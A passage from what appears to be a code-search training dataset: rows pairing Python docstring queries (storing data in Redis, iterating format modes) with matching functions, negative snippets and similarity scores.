i < self.n:\n\t\t\treturn self.v[i]", "def take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def get_info(index, n):\n return index/n, index%n", "def nth(f, *N):\n return dmp_ground_nth(f.rep, N, f.lev, f.dom)", "def __getitem__(self, n):\n if isinstance(n, slice):\n start, stop, step = n.start, n.stop, n.step\n if not start:\n start = 0\n if not stop:\n stop = len(self)\n if stop < 0:\n stop = len(self) + stop\n if start < 0:\n start = len(self) + start\n return self._fa.get_seq(self.name, start + 1, stop)[::step]\n\n elif isinstance(n, int):\n if n < 0:\n n = len(self) + n\n return self._fa.get_seq(self.name, n + 1, n + 1)", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def everyotheritem(n):\n print(n[1::2])\n return(n[1::2])", "def get_by_index(self, index):\n if index > self.length - 1:\n return None\n else:\n return self.items[index]", "def __getitem__(self, index):\n if self.is_empty():\n raise IndexError\n elif index == 0:\n return self._first\n else:\n return self._rest.__getitem__(index - 1)\n # Equivalently, return self._rest[index - 1]", "def get_item(self, index: int) -> _T:\n return self.index_to_item[index]", "def index(item, i):\n try:\n return item[i]\n except IndexError:\n return \"\"", "def __getitem__(self, index: int) -> Any:\n # If empty raise indexerror\n if self.is_empty():\n raise IndexError\n # Set the _first item\n elif index == 0:\n return self._first\n # Recurse on _rest\n else:\n return self._rest[index - 1]", "def getitem_link(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def getitem_link(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def __getitem__(self, index):\r\n return self._items[index]" ]
[ "0.7396352", "0.72852194", "0.72852194", "0.72852194", "0.7229926", "0.7180901", "0.70936525", "0.69702876", "0.6887761", "0.6603851", "0.6541124", "0.6488166", "0.6476991", "0.64401025", "0.64200073", "0.6405436", "0.63758516", "0.6363515", "0.63572127", "0.62999797", "0.6292197", "0.62667274", "0.623331", "0.62273806", "0.6226873", "0.6156516", "0.6134329", "0.6122636", "0.6122636", "0.6105235" ]
0.7512134
0
Store any type of data in Redis
def store(self, data: Union[str, bytes, int, float]) -> str: k = str(uuid.uuid4()) self._redis[k] = data return k
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def store(self, data: Union[str, bytes, int, float]) -> str:\n key = str(uuid.uuid4())\n self._redis.set(key, data)\n return key", "def redis_save(key: object, value: object) -> object:\n if key is not None and value is not None:\n red.redis.set(json.dumps(key), json.dumps(value))", "def publish_data(data):\n redis_db.publish(DATA_CHANNEL, json.dumps(data))", "def put(data):", "def store(self,key,start,end,data):\n\n pass", "def store(self, key, value):\n pass", "def buffer(self, entry):\n # TODO\n print(\"Storing {} in Redis.\".format(entry))\n\n # Redis list to store all ids of entities\n self._pipeline.rpush(\n self._list_name,\n '{}'.format(entry.id)\n )\n\n # Redis hash to store all attributes of entities\n hash_name = '{}:{}'.format(self._list_name, entry.id)\n hash_dict = {}\n field_names = list(entry.__all__)\n field_names.remove('id')\n for field_name in field_names:\n hash_dict[field_name] = getattr(entry, field_name)\n\n self._pipeline.hmset(hash_name, hash_dict)", "def to_redis(self, value, **kwargs):\n return self.to_python(value)", "def store(self, key, headers, value):", "def _put(self, key: bytes, value: bytes, expire_time_ms: int=None):\n self.db.put(key, pickle.dumps((value, expire_time_ms)))", "def set_to_db(key, str_value):\n redis_db.set(KEY_PREFIX + key, str_value)", "def put(self,data):\n\n \n try:\n\n db = getDatabase()\n connection = db.connect()\n \n connection.put(self,data)\n except Exception as e:\n raise e\n finally:\n db.dispose()", "def store(con,command,key,value,flags=0,exptime=0):\n # yy=atpic.log.setname(xx,'store')\n if isinstance(value,int):\n value=\"{0}\".format(value)\n \n commandb=command.encode('utf-8')\n keyb=key.encode('utf-8')\n valueb=value.encode('utf-8')\n bytesnb=len(valueb)\n thecommand=\"{command} {key} {flags} {exptime} {bytes}\\r\\n{value}\\r\\n\".format(command=command,key=key,flags=flags,exptime=exptime,bytes=bytesnb,value=value) \n # atpic.log.debug(yy,'thecommand --->',thecommand,'<---')\n con.send(thecommand.encode('utf-8'))\n response=get_line(con)\n # atpic.log.debug(yy,'response',response)\n return response", "def WriteDataToRedisList(ListName,data):\n redispool = redis.ConnectionPool(host=RedisIP,port=RedisPort,db=RedisDB)\n redata = redis.Redis(connection_pool=redispool)\n redata.lpush(ListName,data)", "def store_search_value(\n self, search_id: Hashable, key: Hashable, value: Any\n ) -> None:\n key = f\"{search_id}.{key}\"\n value = pickle.dumps(value)\n self._redis.set(key, value)", "async def put(self, key, data):\n data = self.convert_object_to_timestamp(data)\n await self.client.set(key, json.dumps(data))", "def callback_object(self, data):\n\n try:\n # TODO support multiple of the same object\n # Save an array of object locations\n self.redis.set(self.prefix+\"_\"+data.name, json.dumps([{\n \"name\": data.name,\n \"time\": data.time,\n \"x\": data.x,\n \"y\": data.y,\n \"z\": data.z\n }]))\n except:\n rospy.logerr(\"Cannot insert row\")", "def store(self, args):\n pass", "def store_data(self, data):\n self.data.append(data)", "def store(bank, key, data):\n c_key = f\"{bank}/{key}\"\n tstamp_key = f\"{bank}/{key}{_tstamp_suffix}\"\n\n try:\n c_data = salt.payload.dumps(data)\n api.kv.put(c_key, c_data)\n api.kv.put(tstamp_key, salt.payload.dumps(int(time.time())))\n except Exception as exc: # pylint: disable=broad-except\n raise SaltCacheError(f\"There was an error writing the key, {c_key}: {exc}\")", "def _put(self, key, data):\n path = self._get_key_path(key)\n with open(path, \"wb\") as pickle_file:\n pickle.dump(data, pickle_file)", "def set_many(self, data, timeout=None):\n try:\n safe_data = {}\n for key, value in data.iteritems():\n safe_data[self.prepare_key(key)] = pickle.dumps(value)\n if safe_data:\n self._cache.mset(safe_data)\n map(self.expire, safe_data, [timeout]*len(safe_data))\n except Exception as err:\n return self.warn_or_error(err)", "def populate_redis(self, d):\n for k, v in d.items():\n self.redis_conn.set(k, v)", "def set_to_redis(self, key: str, value):\n self.redis_client.hset(self.root_path, key, value)", "async def _set(self, key, value, ttl=0):\n value = str.encode(value) if isinstance(value, str) else value\n return await self.client.set(key, value, exptime=ttl or 0)", "def store_stream(data: DataStream):\n if data:\n try:\n c1 = datetime.now()\n CC.save_datastream(data,\"datastream\")\n e1 = datetime.now()\n CC.save_datastream_to_influxdb(data)\n i1 = datetime.now()\n print(\"Cassandra Time: \", e1-c1, \" Influx Time: \",i1-e1, \" Batch size: \",len(data.data))\n except:\n cc_log()", "def write(self, record):\n if not record:\n return\n\n # Convert to a dict - inefficient, I know...\n if type(record) is DASRecord:\n record = json.loads(record.as_json())\n if type(record) is dict:\n # If our local queue is full, throw away the oldest entries\n while self.send_queue.full():\n try:\n logging.debug('CachedDataWriter queue full - dropping oldest...')\n self.send_queue.get_nowait()\n except asyncio.QueueEmpty:\n logging.warning('CachedDataWriter queue is both full and empty?!?')\n\n # Enqueue our latest record for send\n self.send_queue.put_nowait(record)\n else:\n logging.warning('CachedDataWriter got non-dict/DASRecord object of '\n 'type %s: %s', type(record), str(record))", "def publish_metric(name, value, type):\n t = time.time()\n m = json.dumps({'monitor':name, type:value, 'time':t})\n r = redis.StrictRedis(host='localhost', port=6379, db=0) \n r.lpush('sensor_readings',m)", "def save_data(self):\n data = self.data\n if data is not None:\n data = base64.encodestring(pickle.dumps(data))\n connection = self._open_db()\n cursor = connection.cursor()\n cursor.execute('UPDATE sessions SET data = ? WHERE id = ?;',\n (data, self.sid))\n cursor.close()\n connection.commit()\n connection.close()", "def save_data(db, dict_key, url, data_to_store):\n if dict_key not in db:\n db[dict_key] = []\n data = db[dict_key]\n data.append({\n 'url': url,\n 'data': data_to_store,\n })\n db[dict_key] = data" ]
[ "0.74398786", "0.7203963", "0.68926376", "0.64535683", "0.6436974", "0.6225524", "0.61990386", "0.61871934", "0.61752015", "0.6131745", "0.6131207", "0.6122489", "0.6113348", "0.6100349", "0.6039475", "0.5939632", "0.59025615", "0.5878599", "0.58582723", "0.5839085", "0.5830305", "0.5815717", "0.5813621", "0.5793122", "0.5788811", "0.57814974", "0.57733136", "0.5765889", "0.5763404", "0.5762745" ]
0.7362231
1
Iterate through supported mode/char combinations.
def iter_mode(n, obj='ndarray'): for mode in cap[obj][MODE]: for char in fmtdict[mode]: yield randitems(n, obj, mode, char)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __iter__(self):\n return iter([v for k, v in sorted(self._modes.items())])", "def modes(self):\n try:\n order = self._current_order\n except AttributeError:\n raise AttributeError('Cannot iterate over modes without iterating over orders!') from None\n mode = -order\n while mode <= order:\n yield mode\n mode += 1", "def get_modes(self, code_block):\r\n # FUCK YOU INDEX ERRORS, LIST COMPS, AND EVEN YOU LAMBDAS I DON'T NEED PRETTY\r\n # 0 = pos mode\r\n # 1 = imm mode\r\n modes, mode_codes = [0, 0], list(reversed(str(code_block[0])))[2:]\r\n x = 0\r\n for mode in mode_codes:\r\n modes[x] = int(mode)\r\n x += 1\r\n print('Get modes: ')\r\n print(modes)\r\n return modes", "def _get_applicable_modes(command):\n mode_dict = {}\n _add_applicable_modes(command, mode_dict)\n return mode_dict.keys()", "def supported_modes(self) -> Set[str]:\n raise NotImplementedError", "def _get_modes(self):\n return self.__modes", "def _read_characters(self):\n\n # Read the character information table\n for c in range(self.smallest_character_code, self.largest_character_code + 1):\n self._process_char(c)", "def test_support_CHANMODES(self):\n self._testFeatureDefault(\"CHANMODES\")\n self._testFeatureDefault(\"CHANMODES\", [(\"CHANMODES\", \"b,,lk,\")])\n self._testFeatureDefault(\"CHANMODES\", [(\"CHANMODES\", \"b,,lk,ha,ha\")])\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \",,,\"),\n {\"addressModes\": \"\", \"param\": \"\", \"setParam\": \"\", \"noParam\": \"\"},\n )\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \",A,,\"),\n {\"addressModes\": \"\", \"param\": \"A\", \"setParam\": \"\", \"noParam\": \"\"},\n )\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \"A,Bc,Def,Ghij\"),\n {\"addressModes\": \"A\", \"param\": \"Bc\", \"setParam\": \"Def\", \"noParam\": \"Ghij\"},\n )", "def test_modes_for_course_multiple(self):\r\n mode1 = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None)\r\n mode2 = Mode(u'verified', u'Verified Certificate', 0, '', 'usd', None)\r\n set_modes = [mode1, mode2]\r\n for mode in set_modes:\r\n self.create_mode(mode.slug, mode.name, mode.min_price, mode.suggested_prices)\r\n\r\n modes = CourseMode.modes_for_course(self.course_key)\r\n self.assertEqual(modes, set_modes)\r\n self.assertEqual(mode1, CourseMode.mode_for_course(self.course_key, u'honor'))\r\n self.assertEqual(mode2, CourseMode.mode_for_course(self.course_key, u'verified'))\r\n self.assertIsNone(CourseMode.mode_for_course(self.course_key, 'DNE'))", "def test_multiple_modes(self, parse_input_mocked_metadata, modes):\n bb = parse_input_mocked_metadata(\"Vac | {}\\n\".format(modes))\n assert bb.operations == [{\"modes\": [0, 1, 2, 5], \"op\": \"Vac\"}]", "def modes(self) -> List[str]:\n return [m.name for m in self._modes]", "def supported_operation_modes(\n self,\n ) -> list[HVACModeT]:", "def getModes(this):\n\t\tthis.checkInit()\n\t\t\n\t\t# On sauvegarde la config actuelle\n\t\tinit = this.config(get=True)\n\t\t\n\t\t# Ensembles de modes\n\t\tformats = Camera.formats.copy()\n\t\tmodes = set()\n\t\t\n\t\t# On averti du départ\n\t\tprint '\\nLooping modes for the camera... (%d modes)' % (len(formats))\n\t\t\t\n\t\t# Pour chaques formats\n\t\twhile formats:\n\t\t\t\n\t\t\t# On récupère le format à tester\n\t\t\tformat = formats.pop()\n\t\t\t\n\t\t\t# Configuration actuelle\n\t\t\tmode = this.config(\n\t\t\t\theight = float(format[1]),\n\t\t\t\twidth = float(format[0])\n\t\t\t)\n\t\t\t\n\t\t\t# On enregistre le mode\n\t\t\tcurrentFormat = (mode['width'], mode['height'])\n\t\t\tmodes.add(currentFormat)\n\t\t\tif currentFormat in formats:\n\t\t\t\tformats.remove(currentFormat)\n\t\t\t\n\t\t\t# On affiche l'itération courante\n\t\t\tprintf('%d%5s\\r' % (len(formats), ''))\n\t\t###\n\t\t\n\t\t# On remet comme avant et on retourne la liste de modes\n\t\tthis.config(params=init); print 'Done, found %d.' % (len(modes))\n\t\treturn [(int(mode[0]), int(mode[1])) for mode in modes]", "def get_modes(self):\n return self.circuit.get_modes()", "def modes(self):\n return np.hstack(tuple(self.operator.modes))", "def _modes(self):\n answer = []\n for i in dir(self):\n if i.startswith('handle_'):\n answer.append(i.replace('handle_', ''))\n return answer", "def get_modes(self):\n modes = set()\n for er in self.exercise_recordings:\n if er.mode not in modes:\n modes.add(er.mode)\n return list(modes)", "def get_modes(self):\n return [i for i, j in enumerate(self._modemap._map) if j is not None]", "def init_modes(self):\n \n self.deleteMode = delete_Mode()\n self.commandMode = command_Mode()\n self.visualMode = visual_Mode()\n self.insertMode = insert_Mode()\n self.exMode = ex_Mode()\n self.yankMode = yank_Mode()\n self.gmodeMode = gmode_Mode()\n self.cmodeMode = cmode_Mode()\n self.rmodeMode = rmode_Mode()\n self.tmodeMode = tmode_Mode()\n self.selectionMode = selection_Mode()\n self.indentMode = indent_Mode()", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open('output.dat', 'r') as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError('Cannot locate modes in output.dat file.')\n\n # Barring the first (and sometimes last) line, dat file has 6 values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.molecule['input'])) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n\n all_modes = [float(val) for val in structures]\n\n return array(all_modes)", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def __iter__(self):\n\n for opt in self.eset:\n if self.bitflags & int(opt):\n yield opt", "def values(self):\n return self._modes.values()", "def op_modes(self):\n if self._supported_op_modes is None:\n key = self._get_state_key(SUPPORT_OPERATION_MODE)\n if not self.model_info.is_enum_type(key):\n self._supported_op_modes = []\n return []\n mapping = self.model_info.value(key).options\n mode_list = [e.value for e in DHumMode]\n self._supported_op_modes = [DHumMode(o).name for o in mapping.values() if o in mode_list]\n return self._supported_op_modes", "def preset_modes(self) -> List[str]:\n return self._support_presets", "def test_mode_digit():\n print('Testing mode_digit')\n\n # Cases given to test this problem\n assert_equals(1, hw1.mode_digit(12121))\n assert_equals(0, hw1.mode_digit(0))\n assert_equals(2, hw1.mode_digit(-122))\n assert_equals(2, hw1.mode_digit(1211232231))\n\n # Additional cases to test numbers with same digit occurance numbers\n assert_equals(3, hw1.mode_digit(-333000221))\n assert_equals(4, hw1.mode_digit(440011))", "def getDisplayModes(self, obj):\n modes = []\n return modes", "def preset_modes(self):\n return self._preset_modes", "def chordmode():\n for token in consume():\n if source.inSelection and isinstance(token, tokenizer.Pitch):\n transpose(token, 0)", "def preset_modes(self) -> list:\n return self._preset_modes" ]
[ "0.62502277", "0.60794157", "0.594942", "0.5905437", "0.5903358", "0.5762716", "0.56345135", "0.5598813", "0.5586852", "0.5512914", "0.550523", "0.5503041", "0.54652876", "0.5426214", "0.54166454", "0.5404549", "0.53661305", "0.5359288", "0.5355193", "0.53164005", "0.5308114", "0.5291673", "0.5280105", "0.5267146", "0.5189662", "0.51687014", "0.5162793", "0.51604474", "0.51486546", "0.5143419" ]
0.68199724
0
Yield (format, items, item) for all possible modes and format characters plus one random compound format string.
def iter_format(nitems, testobj='ndarray'): for t in iter_mode(nitems, testobj): yield t if testobj != 'ndarray': return yield struct_items(nitems, testobj)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makeNamesFromFormats(formats):\n i = getIter(formats)\n if not i:\n return\n\n try:\n c = 0\n item = i.next()\n while item:\n c = c +1\n name = 'c%s' % c\n if isinstance(item, str):\n yield name\n else:\n l = []\n for a in makeNamesFromFormats(item):\n l.append(a)\n yield (name, l)\n item = i.next()\n except StopIteration:\n pass", "def format(self, data):\r\n for name, value in sorted(data.items()):\r\n line = '{name} = {value}\\n'.format(\r\n name=name,\r\n value=value,\r\n )\r\n yield line", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def iter_mode(n, obj='ndarray'):\n for mode in cap[obj][MODE]:\n for char in fmtdict[mode]:\n yield randitems(n, obj, mode, char)", "def iter_mode(n, obj='ndarray'):\n for mode in cap[obj][MODE]:\n for char in fmtdict[mode]:\n yield randitems(n, obj, mode, char)", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def getFormatsFromDescr(descr):\n i = getIter(descr)\n if not i:\n return\n\n try:\n item = i.next()\n while item:\n item1 = item[1]\n if isinstance(item1, str):\n yield normalize_format(item1)\n else:\n l = []\n for j in getFormatsFromDescr(item1):\n l.append(j)\n yield l\n item = i.next()\n except StopIteration:\n pass", "def format(self, data):\r\n for name, value in sorted(data.items()):\r\n full_text = ': {name} : {value}'.format(\r\n name=name,\r\n value=value,\r\n )\r\n wrapped_text = textwrap.fill(\r\n full_text,\r\n initial_indent='',\r\n subsequent_indent=' ',\r\n width=self.max_width,\r\n )\r\n yield wrapped_text + '\\n'", "def format_basis_for_cfour(self, puream):\n text = ''\n cr = 1\n for fr in range(self.nfragments()):\n if self.fragment_types[fr] == 'Absent':\n pass\n else:\n for at in range(self.fragments[fr][0], self.fragments[fr][1] + 1):\n text += \"\"\"%s:P4_%d\\n\"\"\" % (self.symbol(at).upper(), cr)\n cr += 1\n text += '\\n'\n\n options = collections.defaultdict(lambda: collections.defaultdict(dict))\n options['CFOUR']['CFOUR_BASIS']['value'] = 'SPECIAL'\n options['CFOUR']['CFOUR_SPHERICAL']['value'] = puream\n\n options['CFOUR']['CFOUR_BASIS']['clobber'] = True\n options['CFOUR']['CFOUR_SPHERICAL']['clobber'] = True\n\n options['CFOUR']['CFOUR_BASIS']['superclobber'] = True\n options['CFOUR']['CFOUR_SPHERICAL']['superclobber'] = True\n\n return text, options", "def test_format_info_full1(self):\n\n # The spin info and expected string - covering all possible combinations.\n info = [\n # 5 bits of info.\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala 10, spin N 200\"},\n\n # 4 bits of info.\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue Ala 10, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, residue 10, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala 10, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue Ala 10, spin N\"},\n\n # 3 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue 10, spin N 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue Ala, spin N 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Residue Ala 10, spin 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue Ala 10, spin N\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue 10, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue 10, spin N\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue Ala, spin N\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue Ala 10\"},\n\n # 2 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Spin N 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Residue 10, spin 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue 10, spin N\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Residue Ala, spin 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue Ala, spin N\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Residue Ala 10\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, spin N\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue 10\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue Ala\"},\n\n # 1 bit of info.\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Spin 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Spin N\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Residue 10\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Residue Ala\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi\"},\n\n # 0 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"\"},\n ]\n\n # Printout.\n print(\"Checking %s combinations.\" % len(info))\n\n # Create and check each string.\n for i in range(len(info)):\n print(\" Checking %s\" % info[i])\n string = mol_res_spin.format_info_full(mol_name=info[i]['mol_name'], res_name=info[i]['res_name'], res_num=info[i]['res_num'], spin_name=info[i]['spin_name'], spin_num=info[i]['spin_num'])\n self.assertEqual(string, info[i]['string'])", "def register_format(recipe):\n afr = AFMFormatRecipe(recipe)\n formats_available.append(afr)\n # suffix\n if afr.suffix not in formats_by_suffix:\n formats_by_suffix[afr.suffix] = []\n formats_by_suffix[afr.suffix].append(afr)\n # mode\n if afr.mode not in formats_by_mode:\n formats_by_mode[afr.mode] = []\n formats_by_mode[afr.mode].append(afr)\n # supported extensions\n if afr.suffix not in supported_extensions: # avoid duplucates\n supported_extensions.append(afr.suffix)\n supported_extensions.sort()", "def iter_trans_tokens(self) -> Iterator[TransTokenSource]:\n yield from tkMarkdown.iter_tokens(self.glob_desc, f'items/{self.id}.desc')\n for version in self.versions.values():\n for style_id, variant in version.styles.items():\n yield from variant.iter_trans_tokens(f'items/{self.id}/{style_id}')", "def initFormat(self):\n self.formatList = self.splitText(self.format)", "def xephemFormat(self):\n line = []\n #Field 1: names\n names = [self.getName()]\n identifiers = self.getIdentifiers()\n if identifiers[0] is not None:\n names.append(identifiers[0])\n for i in range(1,4):\n if identifiers[i] is not None:\n names.extend(identifiers[i])\n line.append(\"|\".join(names))\n\n #Field 2: type designation\n objType = self.getType()\n if objType in (\"Galaxy Pair\", \"Galaxy Triplet\", \"Group of galaxies\"):\n line.append(\"f|A\")\n elif objType == \"Globular Cluster\":\n line.append(\"f|C\")\n elif objType == \"Double star\":\n line.append(\"f|D\")\n elif objType in (\"HII Ionized region\", \"Nebula\"):\n line.append(\"f|F\")\n elif objType == \"Galaxy\":\n if self.getHubble().startswith(\"S\"):\n line.append(\"f|G\")\n else:\n line.append(\"f|H\")\n elif objType == \"Dark Nebula\":\n line.append(\"f|K\")\n elif objType in (\"Emission Nebula\", \"Reflection Nebula\"):\n line.append(\"f|N\")\n elif objType in (\"Association of stars\", \"Open Cluster\"):\n line.append(\"f|O\")\n elif objType == \"Planetary Nebula\":\n line.append(\"f|P\")\n elif objType == \"Supernova remnant\":\n line.append(\"f|R\")\n elif objType == \"Star\":\n line.append(\"f|S\")\n elif objType == \"Star cluster + Nebula\":\n line.append(\"f|U\")\n else:\n line.append(\"f\")\n\n #Field 3: Right Ascension\n line.append(self.getRA())\n\n #Field 4: Declination\n line.append(self.getDec())\n\n #Field 5: Magnitude\n #We use the first available magnitude in the sequence b,v,j,h,k\n for mag in self.getMagnitudes():\n if mag is not None:\n line.append(str(mag))\n break\n\n #Field 6: optional Epoch, we let it empty\n line.append(\"\")\n\n #Field 7: Dimensions\n dimensions = []\n #Xephem format wants axes espressed in arcsec, we have arcmin\n for value in (self.getDimensions()[0],self.getDimensions()[1]):\n if value is not None:\n dimensions.append(str(value*60))\n else:\n dimensions.append(\"\")\n if self.getDimensions()[2] is not None:\n dimensions.append(str(value))\n else:\n dimensions.append(\"\")\n line.append(\"|\".join(dimensions))\n\n return \",\".join(line)", "def _translate_fmts(self):\n fmt_info = []\n fmt_append = fmt_info.append\n \n isvalid = self._is_valid_fmt\n typlist = self._typlist\n isstrvar = self._isstrvar\n default_fmts = self._default_fmts\n \n for i, fmt in enumerate(self._fmtlist):\n fmt = fmt.strip()\n \n iscalendar = (fmt[1] == 't' or fmt[1:3] == '-t')\n \n if iscalendar or not isvalid(fmt):\n if isstrvar(i):\n wid = min(typlist[i], 10)\n fmt_append(('s', \"{{:>{}s}}\".format(wid), wid))\n continue\n else:\n fmt = default_fmts[typlist[i]]\n \n last_char = fmt[-1]\n if last_char == 's': # string\n m = STR_FMT_RE.match(fmt)\n align, _, wid = m.group(1), m.group(2), m.group(3)\n new_align = (\"<\" if align == \"-\" \n else \"^\" if align == \"~\" else \">\")\n new = \"\".join((\"{:\", new_align, wid, \"s}\"))\n fmt_append(('s', new, int(wid)))\n elif last_char == 'H' or last_char == 'L': # binary\n fmt_append((last_char, fmt, int(fmt[1:-1])))\n elif last_char == 'x': # hexadecimal\n fmt_append(('x', fmt, 21))\n elif last_char in {'f', 'g', 'e', 'c'}: # numeric\n m = NUM_FMT_RE.match(fmt)\n align, _, wid, delim, prec, type, com = (m.group(1), m.group(2), \n m.group(3), m.group(4),\n m.group(5), m.group(6),\n m.group(7))\n aln = \"<\" if align == \"-\" else \">\"\n sep = \",\" if com is not None else \"\"\n if type == \"g\" and int(prec) == 0:\n new = \"\".join((\"{:\", aln, wid, sep, type, \"}\"))\n else:\n new = \"\".join((\"{:\", aln, wid, sep, \".\", prec, type, \"}\"))\n fmt_append((type, new, int(wid), delim, com))\n \n return fmt_info", "def format(self, item):\n raise NotImplementedError()", "def complete_opt_format(self, text, *_):\n return [t + \" \" for t in FORMATTERS if t.startswith(text)]", "def items(self):\n\t\tfor k, vs in self.multiple.items():\n\t\t\tfor v in vs: yield k, v", "def process_multi_body_format(commands):", "def apply_format(self, **format_vars):\n for construction_dict in (self._actions, self._conditions):\n for 